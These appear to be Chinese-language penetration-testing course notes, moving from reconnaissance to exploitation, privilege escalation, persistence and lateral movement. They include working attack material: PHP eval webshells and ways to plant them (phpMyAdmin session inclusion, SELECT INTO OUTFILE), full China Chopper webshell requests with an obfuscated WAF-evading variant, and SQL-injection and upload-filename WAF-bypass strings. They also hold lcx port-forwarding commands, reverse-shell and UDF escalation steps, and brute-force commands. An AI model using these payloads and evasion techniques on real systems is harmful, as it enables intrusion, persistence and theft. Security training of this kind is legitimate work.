旨在解決滲透測(cè)試中遇到的各種疑難問(wèn)題###

測(cè)試目標(biāo)分類(lèi)：
WEB，APP，PC，SERVER等
APP:
1.利用抓包分析APP數(shù)據(jù)包
2.利用反編譯逆向APP分析

1.信息收集

端口

www.xiaodi8.com
www.xiaodi8.com:8080

真實(shí)：
http://xxxx.xxx.com.cn/portal/LoginBegin.aspx
http://xxxx.xxx.com.cn:8080/login.jsp

發(fā)現(xiàn)：
端口掃描獲取 Nmap

目錄

www.xiaodi8.com 門(mén)戶(hù) phpcms
www.xiaodi8.com/bbs/ 論壇 discuz
www.xiaodi8.com/old/ 舊版 phpwind

發(fā)現(xiàn)：
1.爬行
2.掃描

IP

子域名

1.同服務(wù)器
2.同網(wǎng)段服務(wù)器

課程視頻可參考實(shí)戰(zhàn)全套篇-必看里面

收集：備案信息，網(wǎng)站腳本，數(shù)據(jù)庫(kù)，操作系統(tǒng)等
https://blog.csdn.net/qq_41453285/article/details/94888750

cms程序

開(kāi)源的網(wǎng)站源碼程序，如dedecms，discuz，phpcms，WordPress等
*部分網(wǎng)站也會(huì)采用不開(kāi)源或內(nèi)部源碼搭建

1.開(kāi)源
源碼可以下載到，直接進(jìn)行代碼審計(jì)（漏洞挖掘）
利用網(wǎng)上公開(kāi)的漏洞進(jìn)行測(cè)試驗(yàn)證

2.內(nèi)部
黑盒測(cè)試，只能掃漏洞，測(cè)試漏洞

cms識(shí)別技術(shù) 指紋識(shí)別
平臺(tái)識(shí)別 bugscaner 云悉
工具識(shí)別 whatweb 御劍指紋識(shí)別

中間件

實(shí)驗(yàn)：nginx解析漏洞利用
1.通過(guò)訪(fǎng)問(wèn)網(wǎng)站發(fā)現(xiàn)中間件為nginx
2.通過(guò)網(wǎng)站自帶的上傳功能上傳圖片
3.利用解析漏洞訪(fǎng)問(wèn)形式去觸發(fā)圖片后門(mén)代碼

*通過(guò)判斷網(wǎng)站使用的中間件，嘗試中間件漏洞的驗(yàn)證和利用

第三方

如何獲取第三方軟件是否存在？
一般采用端口掃描探針

演示1：HFS第三方軟件服務(wù)漏洞利用
1.通過(guò)端口掃描探針到目標(biāo)存在8080端口
2.訪(fǎng)問(wèn)獲取是第三方軟件HFS調(diào)用
3.利用公開(kāi)的HFS漏洞進(jìn)行驗(yàn)證利用

演示2：phpmyadmin文件包含漏洞利用
1.通過(guò)web掃描探針到網(wǎng)站存在phpmyadmin
2.通過(guò)phpmyadmin公開(kāi)漏洞進(jìn)行驗(yàn)證利用

拓展玩法:
利用phpmyadmin特性,執(zhí)行sql命令時(shí)會(huì)將執(zhí)行的代碼寫(xiě)入到session中，
再利用包含漏洞包含該session文件（session文件以cookie中的值命名）
代碼：后門(mén)代碼 select '<?php eval($_POST[x]);?>'

2.漏洞發(fā)現(xiàn)

漏洞問(wèn)題

1.登錄類(lèi)網(wǎng)站掃描
帶入登錄掃描
帶入cookie掃描
2.開(kāi)源CMS網(wǎng)站程序
3.其他漏洞測(cè)試

WEB漏洞

漏洞分類(lèi)：sql注入，xss跨站，文件上傳，代碼執(zhí)行，文件包含等
漏洞影響：漏洞能干嘛？能實(shí)現(xiàn)什么目的？
漏洞掃描：AWVS，Appscan，Netsparker等

1.漏洞掃描發(fā)現(xiàn)注入漏洞
2.利用sqlmap進(jìn)行注入測(cè)試

系統(tǒng)漏洞

漏洞掃描：nessus，openvas
大部分結(jié)合MSF

漏洞具體發(fā)現(xiàn)形式

黑盒測(cè)試：掃描，探針，搜索等
sql注入
文件上傳
XSS跨站
代碼執(zhí)行
邏輯越權(quán)
、、、、

漏洞掃描 專(zhuān)業(yè)掃描工具去判定（sql注入，xss跨站等）
漏洞探針 人為尋找漏洞去測(cè)試（第三方軟件或中間件等）

案例：業(yè)務(wù)邏輯
1.訂單金額修改
2.短信接口枚舉
3.任意信息查看
。。。。。。。

原因：
可能需要登錄狀態(tài)操作
可能需要變換參數(shù)測(cè)試

www.xiaodi8.com/member.php?id=1 對(duì)應(yīng)用戶(hù)xiaodi
www.xiaodi8.com/member.php?id=2 對(duì)應(yīng)用戶(hù)xxiao

白盒測(cè)試：代碼審計(jì)

有些漏洞是可以通過(guò)掃描工具去發(fā)現(xiàn)的，部分漏洞是必須要人為去測(cè)試發(fā)現(xiàn)的。

漏洞分類(lèi)：
sql注入，文件上傳，xss跨站，代碼執(zhí)行，命令執(zhí)行，邏輯越權(quán)，目錄遍歷等
可以用掃描工具獲取到

dedecms某處注入，phpcms某處上傳，discuz某處代碼執(zhí)行，thinkphp5代碼執(zhí)行等
無(wú)法掃描工具獲取到 需要特定的漏洞插件或?qū)Ｓ霉ぞ咛结?也可以使用公開(kāi)文檔資料判定

關(guān)于漏洞掃描需要采用兩種掃描：1.awvs掃描 2.cms插件掃描

3.漏洞利用
漏洞產(chǎn)生：
可控變量 函數(shù)
什么函數(shù)將導(dǎo)致什么漏洞

_POST _REQUEST _SERVER

漏洞的影響
1.用于實(shí)戰(zhàn) 強(qiáng)調(diào)權(quán)限
2.用于挖掘 強(qiáng)調(diào)漏洞
3.用于加固 強(qiáng)調(diào)漏洞

sql注入
sqlmap havij pangolin 超級(jí)注入工具 啊D 明小子
數(shù)據(jù)庫(kù)類(lèi)型 Access mysql mssql oracle postsql db2 sybase等

文件上傳
burpsuite fiddler fuzz上傳字典（模糊測(cè)試）
fuzz應(yīng)用案例：
測(cè)試WAF注入或上傳繞過(guò)時(shí)，經(jīng)常需要對(duì)特定關(guān)鍵字或格式進(jìn)行變異進(jìn)行繞過(guò)測(cè)試

xss跨站
xss平臺(tái) beef xsser
xss主要結(jié)合其他漏洞或方法進(jìn)行攻擊

代碼執(zhí)行

命令執(zhí)行

文件包含

目錄遍歷

csrf攻擊

業(yè)務(wù)邏輯

xml
ssrf
。。。。

加固：
1.引用安全軟件
2.直接對(duì)應(yīng)修復(fù)

漏洞利用問(wèn)題：
1.安全軟件攔截
2.漏洞自身問(wèn)題

漏洞誤報(bào)案例:
www.xiaodi8.com/news.php?id=1

4.權(quán)限提升

劃分：
數(shù)據(jù)庫(kù)權(quán)限
后臺(tái)權(quán)限
web權(quán)限
服務(wù)器權(quán)限

比如某棋牌網(wǎng)站，得到操作控制數(shù)據(jù)（開(kāi)獎(jiǎng)數(shù)據(jù)）的目的？
1.數(shù)據(jù)庫(kù)權(quán)限
2.web權(quán)限
3.服務(wù)器權(quán)限
4.后臺(tái)權(quán)限

后臺(tái)權(quán)限或數(shù)據(jù)庫(kù)權(quán)限<==>網(wǎng)站權(quán)限==>系統(tǒng)權(quán)限

系統(tǒng)漏洞或第三方軟件漏洞==>系統(tǒng)權(quán)限

獲取網(wǎng)站權(quán)限

分類(lèi)
原因：漏洞的情況
直接獲取權(quán)限 文件上傳 代碼執(zhí)行等
間接獲取權(quán)限 sql注入 xss跨站等
后臺(tái)獲取權(quán)限相關(guān)解釋
獲取方法主要看后臺(tái)的具體功能決定
1.sql執(zhí)行
2.數(shù)據(jù)庫(kù)備份
3.web模版修改
4.文件上傳
5.其他

案例：
測(cè)試本地某網(wǎng)站后臺(tái)web權(quán)限獲?。?br> 2.SQL執(zhí)行
1.文件管理器

http://127.0.0.1/upload//api/addons/zendcheck.php
D:\phpstudy\PHPTutorial\WWW\upload\api\addons\zendcheck53.php

http://127.0.0.1/010/dede/index.php
D:\phpstudy\PHPTutorial\WWW\010\dede\index.php

select '1' into outfile 'D:\phpstudy\PHPTutorial\WWW\010\dede.php';
http://127.0.0.1/010/dede.php

技巧：
1.cms的話(huà)可以直接通過(guò)搜索xxxcms后臺(tái)拿shell獲取操作方法
2.不知道cms或內(nèi)部程序的話(huà)需要通過(guò)具體的后臺(tái)功能來(lái)逐個(gè)測(cè)試

獲取系統(tǒng)權(quán)限

webshell提權(quán)
1.數(shù)據(jù)庫(kù)提權(quán)
2.溢出漏洞提權(quán)
3.第三方軟件提權(quán)

案例：通過(guò)web權(quán)限提升至服務(wù)器權(quán)限
利用系統(tǒng)溢出漏洞測(cè)試提升
1.通過(guò)磁盤(pán)權(quán)限獲取上傳cmd突破無(wú)法執(zhí)行cmd
2.通過(guò)msf生成的反彈exe進(jìn)行執(zhí)行反彈
3.接受反彈會(huì)話(huà)進(jìn)行exp篩選后執(zhí)行

案例：通過(guò)web權(quán)限提升至服務(wù)器權(quán)限
利用網(wǎng)站數(shù)據(jù)庫(kù)進(jìn)行提升
條件：數(shù)據(jù)庫(kù)最高用戶(hù)的密碼
1.通過(guò)探針獲取服務(wù)器上數(shù)據(jù)庫(kù)類(lèi)型mysql
2.通過(guò)查看網(wǎng)站數(shù)據(jù)庫(kù)配置文件或數(shù)據(jù)庫(kù)目錄文件獲取root密碼
3.通過(guò)mysql——udf進(jìn)行權(quán)限提升

網(wǎng)站數(shù)據(jù)庫(kù)配置文件：命名規(guī)則（sql,data,inc,conn,config,database等）
數(shù)據(jù)庫(kù)目錄文件：安裝目錄下的/data/mysql/user.myd
GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

windows
guest users administrators system

linux
users root

權(quán)限維持
其他權(quán)限
網(wǎng)站權(quán)限
服務(wù)器權(quán)限

案例：后臺(tái)權(quán)限維持
利用xss跨站腳本進(jìn)行權(quán)限維持

案例：網(wǎng)站權(quán)限
后門(mén)文件的隱藏變異
后門(mén)查殺
https://www.uedbox.com/post/51754/
查殺原理：分析文件中的代碼進(jìn)行劃分
后門(mén)代碼存在相關(guān)關(guān)鍵字高危函數(shù)

后門(mén)免殺
https://xz.aliyun.com/t/5152

PHP后門(mén)代碼：<?php eval($_POST['x']);?>

1.免殺
函數(shù)替換
函數(shù)字符串猜分組合
自定義函數(shù)
回調(diào)函數(shù)
編碼繞過(guò)

實(shí)例：
寫(xiě)一個(gè)屬于自己的免殺后門(mén)
思考：針對(duì)其他后門(mén)進(jìn)行免殺處理
1.重新解密分析 一一修改
2.重寫(xiě)規(guī)則加密編碼

2.隱藏

5.橫向滲透

內(nèi)網(wǎng)滲透

主機(jī)發(fā)現(xiàn)
    存活主機(jī)
        計(jì)算機(jī)名，MAC地址，IP地址
掃描主機(jī)
    端口，系統(tǒng)，漏洞，密碼等
攻擊主機(jī)
取得權(quán)限

域滲透 工作組
POWERSHELL

192.168.1.100
192.168.1.0-192.168.1.255
255.255.255.0

端口
案例：135端口滲透測(cè)試

協(xié)議
案例：ARP欺騙
案例：會(huì)話(huà)劫持
案例：DNS劫持

口令
getpass minikatz
可以獲取windows操作系統(tǒng)的明文密碼

內(nèi)網(wǎng)分為數(shù)據(jù)庫(kù)服務(wù)器，web服務(wù)器，其他的服務(wù)器等

會(huì)話(huà)劫持 COOKIE欺騙 區(qū)別
session cookie 用戶(hù)身份憑據(jù)
session存儲(chǔ)服務(wù)端 存活短
cookie存儲(chǔ)客戶(hù)端 存活長(zhǎng)

總結(jié)：
http https
cookie session
netfuke cain ettercap arpspoof cobaltstrike

UAC
端口轉(zhuǎn)發(fā)
讓內(nèi)網(wǎng)主動(dòng)將數(shù)據(jù)給到外網(wǎng)
A可以連接B B不能連接A
A充當(dāng)內(nèi)網(wǎng)地址 B充當(dāng)外網(wǎng)地址

A 192.168.38.130
lcx.exe -slave 192.168.0.106 3333 127.0.0.1 3389
將本地的3389端口轉(zhuǎn)發(fā)至192.168.0.106上的3333端口

B 192.168.0.106
lcx.exe -listen 3333 1111
監(jiān)聽(tīng)本地3333端口并轉(zhuǎn)發(fā)至1111
然后連接本地的1111即可

實(shí)戰(zhàn)意義：
解決數(shù)據(jù)連接問(wèn)題
繞過(guò)防火墻策略

關(guān)于文件上傳下載的問(wèn)題：
linux：wget curl
windows powershell（win高版本） ftp腳本（win低版本）

案例：

SSRF
http://www.itdecent.cn/p/6bf7700139fa
https://www.zhangshengrong.com/p/281oQGrNwz/

環(huán)境：
A主機(jī)： 192.168.38.129
B主機(jī)： 27.19.126.82 192.168.0.101
C主機(jī): 192.168.0.106

A能連接B
B能連接C
A不能連接C

攻擊者A訪(fǎng)問(wèn)：http://192.168.0.101/ssrf/index.php?url=192.168.0.106:80
通過(guò)B主機(jī)的ssrf漏洞去探針C主機(jī)的80端口

真實(shí)環(huán)境：
網(wǎng)站服務(wù)器ip 202.104.15.185
存在www.xiaodi8.com網(wǎng)站
同時(shí)存在內(nèi)網(wǎng)IP 192.168.0.105

同網(wǎng)段服務(wù)器ip 192.168.0.1 - 192.168.0.255

攻擊者可以通過(guò)訪(fǎng)問(wèn)www.xiaodi8.com 利用此網(wǎng)站的ssrf漏洞
去探針192.168.0.1 - 192.168.0.255 上的情況并進(jìn)行漏洞利用

安全加固，自定義

安全開(kāi)發(fā)，自定義

賽制練習(xí)，自定義

其他補(bǔ)充，自定義

附：詳細(xì)見(jiàn)論壇靶場(chǎng)
sqlilabs
uploadlabs
xxelab
xssdemo
ssrflab
pikachu
vulhub
xssdemo

===================================================
漏洞發(fā)現(xiàn)
https://xz.aliyun.com/t/6282
登陸頁(yè)面滲透測(cè)試常見(jiàn)的幾種思路與總結(jié)

00x1 sql注入

萬(wàn)能密碼繞過(guò)原理

原理：網(wǎng)站后臺(tái)登錄時(shí)，會(huì)對(duì)帳號(hào)密碼進(jìn)去判斷，返回正確即登錄成功，反之失??！利用sql語(yǔ)句中的邏輯運(yùn)算符（and or xor對(duì)應(yīng)的 且 或 非）進(jìn)行組合得到返回結(jié)果
and 且
or 或
xor 非

例子：
真 且 真 = 真
真 且 假 = 假
真 或 真 = 真
真 或 假 = 真

常見(jiàn)的后臺(tái)登錄的sql語(yǔ)句
SELECT * FROM admin WHERE username = 'password)';

'or 1=1--
SELECT * FROM admin WHERE username = '' or 1=1--' and password ='md5($password)';

SELECT * FROM admin WHERE username = '' 假
1=1 真

假 或 真 = 真

sql注入 post注入

SELECT * FROM admin WHERE username = 'password)';
admin' union select 1,2,3,4... --

SELECT * FROM admin WHERE username = 'admin' union select 1,2,3,4... --' and password ='md5($password)';

漏洞發(fā)現(xiàn)關(guān)注應(yīng)用：
新聞列表
登錄地址
用戶(hù)中心
后臺(tái)管理
第三方插件

案例：某微盤(pán)交易漏洞測(cè)試
1.自帶框架漏洞1
2.自帶框架漏洞2
3.注冊(cè)未過(guò)濾XSS
4.注冊(cè)邏輯越權(quán)

1.如何判定網(wǎng)站框架或CMS
2.了解常見(jiàn)的框架或cms的漏洞
3.XSS漏洞攻擊的理解
4.邏輯越權(quán)理解 攻擊理解

關(guān)注是否存在A(yíng)PP
關(guān)注是否存在服務(wù)端口
關(guān)注是否存在旁注站點(diǎn)
關(guān)注是否存在敏感文件
關(guān)注是否存在系統(tǒng)安全
關(guān)注是否存在口令安全
.............

漏洞利用
某drupal漏洞測(cè)試
http://www.babakimaz.com

CMS識(shí)別 利用CMS漏洞進(jìn)行測(cè)試（查找漏洞，漏洞利用類(lèi)型）
國(guó)內(nèi)CMS漏洞查找：百度搜索 seebug等漏洞平臺(tái)
國(guó)外CMS漏洞查找：國(guó)外漏洞平臺(tái)

常規(guī)測(cè)試：
漏洞掃描
目錄掃描
.......

基于CMS利用測(cè)試 zoomeye
www.exploit-db.com
cn.0day.today

http://down.chinaz.com/soft/36930.htm

代碼審計(jì)
白盒測(cè)試
1.搭建成功后 利用WEB漏洞掃描工具探針
2.利用網(wǎng)站的源碼進(jìn)行代碼審計(jì)挖掘漏洞

準(zhǔn)備工作：
漏洞產(chǎn)生：函數(shù) 可控變量
例：sql注入
函數(shù)關(guān)鍵字：mysql_connect mysql_select_db mysql_query等
可控變量關(guān)鍵字：_POST _SERVER等

定點(diǎn)漏洞挖掘：
分析漏洞產(chǎn)生條件==》
得到漏洞關(guān)鍵字==》
利用工具查找關(guān)鍵字==》
分析文件名進(jìn)行判斷篩選==》
對(duì)文件進(jìn)行代碼分析 跟蹤變量 ==》
確定是否存在漏洞

附加：數(shù)據(jù)庫(kù)監(jiān)控工具
直接通過(guò)頁(yè)面執(zhí)行 對(duì)應(yīng)執(zhí)行的sql語(yǔ)句 進(jìn)行定點(diǎn)查看

隨緣漏洞挖掘：

1.文本批量查找工具

例子:某QQ業(yè)務(wù)程序源碼漏洞發(fā)現(xiàn)：
1.漏洞掃描工具Netsparker未獲取到有價(jià)值的漏洞信息
2.源碼分析 代碼審計(jì)

網(wǎng)站輸出業(yè)務(wù)ID 存在可控變量
保存訂單 存在可控變量
輸出訂單 存在可控變量
輸出業(yè)務(wù)限制 存在可控變量

function ywID($ID){

ID." LIMIT 0 , 30";
SQL);
FH);
return $sj;

}
_GET['id']);

x.php?id=1 ==> ywID(1) ==> $ID

SELECT * FROM dd WHERE ip LIKE '192.168.11.11'LIMIT 0 , 30

SELECT * FROM dd WHERE ip LIKE '127.0.0.1' union select 1,2,3,4,5''LIMIT 0 , 30

框架類(lèi) thinkphp yii
框架類(lèi)代碼審計(jì) 實(shí)例thinkphp

1.找到thinkphp入口文件（index.php）
define('PROJECT_PATH', SITE_PATH . 'lvyecms/');

對(duì)應(yīng)文件
URL訪(fǎng)問(wèn)
開(kāi)啟Trace調(diào)試

Lvyecms任意文件刪除（thinkphp3.2.3）
index.php?g=Template&m=Style&a=delete&dir=.....///Application/Install/&file=install.lock

微盤(pán)21系統(tǒng)SQL注入（thinkphp5）
https://github.com/Mochazz/ThinkPHP-Vuln

漏洞原理
SQL注入 sqlilabs
文件上傳 uploadlabs
XSS跨站 xssdemo
其他漏洞綜合 pikachu

上傳漏洞客戶(hù)端和服務(wù)端驗(yàn)證區(qū)別:
本地及服務(wù)器驗(yàn)證
本地驗(yàn)證返回時(shí)間極短，可通過(guò)源代碼查看到過(guò)濾代碼

MIME驗(yàn)證
png格式圖片
Content-Type: image/png
php格式文件
Content-Type: application/octet-stream

多種格式變異繞過(guò)

.htaccess結(jié)合apache達(dá)到任意解析

大小寫(xiě)繞過(guò)

6 7 .
變異解析
空格 點(diǎn) 分號(hào)干擾

windows特性 ::$DATA 來(lái)繞過(guò)后綴過(guò)濾

讓過(guò)濾拆分形成原型php

未進(jìn)行遞歸繞過(guò)

11.12
利用可操作的文件路徑做文章 結(jié)合00截?cái)?/p>

13 14 15 16
文件包含漏洞結(jié)合

17-20

WAF繞過(guò)
WAF產(chǎn)品研究

安全狗
云鎖
寶塔
安騎士
360網(wǎng)站衛(wèi)士
D盾
護(hù)衛(wèi)神
.....

WAF防護(hù)規(guī)則

sql注入攔截
安全工具攔截
xss注入攔截
應(yīng)用風(fēng)險(xiǎn)攔截
上傳漏洞攔截
瀏覽訪(fǎng)問(wèn)攔截
內(nèi)容相應(yīng)防護(hù)
資源訪(fǎng)問(wèn)防護(hù)

WAF繞過(guò)技術(shù)

案例：掃描繞過(guò) 內(nèi)容相應(yīng)防護(hù)
1.御劍掃描無(wú)結(jié)果 編寫(xiě)的腳本有結(jié)果 （請(qǐng)求方式差異）
2.網(wǎng)站出現(xiàn)連接無(wú)回復(fù) （訪(fǎng)問(wèn)速度過(guò)快）

D:\python3\python.exe E:/myproject/filescan06.py http://localhost dir.txt 10

HEAD http://www.xiaodi8.com/syssite/install/ini_setup.php HTTP/1.1
Host: www.xiaodi8.com
Connection: Keep-Alive

GET http://localhost/1111 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.94
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

案例：菜刀工具 安全工具攔截

攔截的菜刀數(shù)據(jù)包
POST http://192.168.0.104/cd.php?x=bb HTTP/1.1
X-Forwarded-For: 154.9.13.158
Referer: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 192.168.0.104
Content-Length: 686
Pragma: no-cache

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D

a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

不攔截的菜刀數(shù)據(jù)包：
POST http://192.168.0.104/cd.php?x=bb HTTP/1.1
X-Forwarded-For: 69.156.102.102
Referer: http://192.168.0.104/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: 192.168.0.104
Content-Length: 794
Pragma: no-cache

a=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0Q6XFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXFdXV1xcJzskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJy8nLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiJcbiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygiWEBZIik7ZGllKCk7'));");"));

案例：SQL注入 繞過(guò)攔截
1.干擾字符
2.fuzz結(jié)合
3.請(qǐng)求方式

參考：
https://www.anquanke.com/post/id/173474?from=timeline
https://www.cnblogs.com/perl6/p/6120045.html

id=1'union/%00/%23a%0A/!/!select 1,2,3/;%23
id=-1%27union/%00/%23a%0A/!/!select%201,database%23x%0A(),3/;%23

id=-1%27%20union%20/!44509select/%201,2,3%23
id=-1%27%20union%20/!44509select/%201,%23x%0A/!database/(),3%23

id=1/*&id=-1%27%20union%20select%201,2,3%23/

id=-1%27%20union%20all%23%0a%20select%201,2,3%23
-1%27%20union%20all%23%0a%20select%201,%230%0Adatabase/**/(),3%23

案例：上傳漏洞 繞過(guò)攔截
文件名匹配干擾 干擾符
參數(shù)變異干擾 截?cái)喽鄥?shù)等

前提條件：存在上傳漏洞的情況測(cè)試?yán)@過(guò)

Content-Disposition 一般可以進(jìn)行任意修改甚至刪除
filename 可以修改
Content-Type 視情況而定 需要考慮網(wǎng)站上傳驗(yàn)證是否進(jìn)行處理

filename="x.php%00.jpg"
filename=php.php
filename="php.php
filename= ;filename="php.php"
filename="x.
p
h
p
"

WAF腳本編寫(xiě)

python開(kāi)發(fā)

作用意義：
1.很多漏洞利用代碼會(huì)采用python去編寫(xiě)
2.根據(jù)自己的需求去寫(xiě)python腳本測(cè)試

www.xiaodi8.com/index.php?x=1
www.xiaodi8.com/index.php
x=1

requests庫(kù)安裝及使用
參考：https://www.cnblogs.com/zhangxinqi/p/9201594.html

案例：WEB掃描腳本實(shí)現(xiàn) GET
案例：模擬用戶(hù)登錄實(shí)現(xiàn) POST

網(wǎng)絡(luò)編程 多線(xiàn)程編程 數(shù)據(jù)庫(kù)編程

多線(xiàn)程任務(wù)處理
端口掃描 子域名 FTP等模塊

前期條件：端口掃描

文件共享服務(wù)端口滲透

ftp服務(wù)
FTP服務(wù)：ftp服務(wù)我分為兩種情況，第一種是使用系統(tǒng)軟件來(lái)配置，比如IIS中的FTP文件共享或Linux中的默認(rèn)服務(wù)軟件；第二種是通過(guò)第三方軟件來(lái)配置，比如Serv-U還有一些網(wǎng)上寫(xiě)的簡(jiǎn)易ftp服務(wù)器等；
默認(rèn)端口：20（數(shù)據(jù)端口）；21（控制端口）；69（tftp小型文件傳輸協(xié)議）
攻擊方式：
爆破：ftp的爆破工具有很多，Bruter以及msf中ftp爆破模塊；
匿名訪(fǎng)問(wèn)：用戶(hù)名：anonymous 密碼：為空或任意郵箱

Samba服務(wù)
Samba服務(wù)：對(duì)于這個(gè)可以在windows與Linux之間進(jìn)行共享文件的服務(wù)同樣是我們攻擊的關(guān)注點(diǎn)；samba登錄分為兩種方式，一種是需要用戶(hù)名口令；另一種是不需要用戶(hù)名口令。在很多時(shí)候不光是pc機(jī)，還有一些服務(wù)器，網(wǎng)絡(luò)設(shè)備都開(kāi)放著此服務(wù)，方便進(jìn)行文件共享，但是同時(shí)也給攻擊者提供了便利。
默認(rèn)端口：137（主要用戶(hù)NetBIOS Name Service；NetBIOS名稱(chēng)服務(wù)）、139（NetBIOS Session Service，主要提供samba服務(wù)）
攻擊方式：
爆破：弱口令（爆破工具采用hydra）hydra -l username -P
PassFile IP smb
未授權(quán)訪(fǎng)問(wèn)：給予public用戶(hù)高權(quán)限
遠(yuǎn)程代碼執(zhí)行漏洞：CVE-2015-0240等等

LDAP協(xié)議
ldap：輕量級(jí)目錄訪(fǎng)問(wèn)協(xié)議，最近幾年隨著ldap的廣泛使用被發(fā)現(xiàn)的漏洞也越來(lái)越多。但是畢竟主流的攻擊方式仍舊是那些，比如注入，未授權(quán)等等；這些問(wèn)題的出現(xiàn)也都是因?yàn)榕渲貌划?dāng)而造成的。
默認(rèn)端口：389
攻擊方式：注入攻擊盲注 未授權(quán)訪(fǎng)問(wèn)
爆破：弱口令

遠(yuǎn)程連接服務(wù)端口滲透

SSH服務(wù)
SSH服務(wù)：這個(gè)服務(wù)基本會(huì)出現(xiàn)在我們的Linux服務(wù)器，網(wǎng)絡(luò)設(shè)備，安全設(shè)備等設(shè)備上，而且很多時(shí)候這個(gè)服務(wù)的配置都是默認(rèn)的；對(duì)于SSH服務(wù)我們可能使用爆破攻擊方式較多。
默認(rèn)端口：22
攻擊方式
爆破：弱口令
漏洞：28退格漏洞、OpenSSL漏洞

Telnet服務(wù)：在SSH服務(wù)崛起的今天我們已經(jīng)很難見(jiàn)到使用telnet的服務(wù)器，但是在很多設(shè)備上同樣還是有這個(gè)服務(wù)的；比如cisco、華三，深信服等廠(chǎng)商的設(shè)備；我就有很多次通過(guò)telnet弱口令控制這些設(shè)備；
默認(rèn)端口：23
攻擊方式
爆破：弱口令
嗅探：此種情況一般發(fā)生在局域網(wǎng)

遠(yuǎn)程桌面連接：作為windows上進(jìn)行遠(yuǎn)程連接的端口，很多時(shí)候我們?cè)诘玫较到y(tǒng)為windows的shell的時(shí)候我們總是希望可以登錄3389實(shí)際操作對(duì)方電腦；這個(gè)時(shí)候我們一般的情況分為兩種。一種是內(nèi)網(wǎng)，需要先將目標(biāo)機(jī)3389端口反彈到外網(wǎng)；另一種就是外網(wǎng)，我們可以直接訪(fǎng)問(wèn)；當(dāng)然這兩種情況我們利用起來(lái)可能需要很苛刻的條件，比如找到登錄密碼等等；
默認(rèn)端口：3389
攻擊方式：
爆破：3389端口爆破工具就有點(diǎn)多了
